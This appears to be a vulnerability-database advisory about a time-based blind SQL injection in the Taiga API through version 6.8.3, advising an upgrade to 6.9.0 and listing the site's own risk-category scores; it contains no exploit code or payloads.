Primary

Context

Taiga API Time-Based Blind SQL Injection Vulnerability Allowing Sensitive Data Disclosure

Vulnerability

A time-based blind SQL injection vulnerability has been identified in the Taiga API, specifically in versions through 6.8.3. This vulnerability allows for the unauthorized disclosure of sensitive data by manipulating response timing. The issue has been addressed in version 6.9.0.

Impact

Exploitation of this vulnerability could lead to unauthorized access and disclosure of sensitive data from the database, based on the attacker's ability to manipulate and observe response times.

Remediation

Users can upgrade to Taiga version 6.9.0 to address this vulnerability.

Added: Oct 28, 2025, 8:18 PM

Updated: Oct 28, 2025, 8:18 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

2.5

exploitability

5.2

remediation

7.7

relevance

0.8

threat

0.0

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

2.5

exploitability

5.2

remediation

7.7

relevance

0.8

threat

0.0

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Taiga API Time-Based Blind SQL Injection Vulnerability Allowing Sensitive Data Disclosure

Vulnerability

Impact

Remediation

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating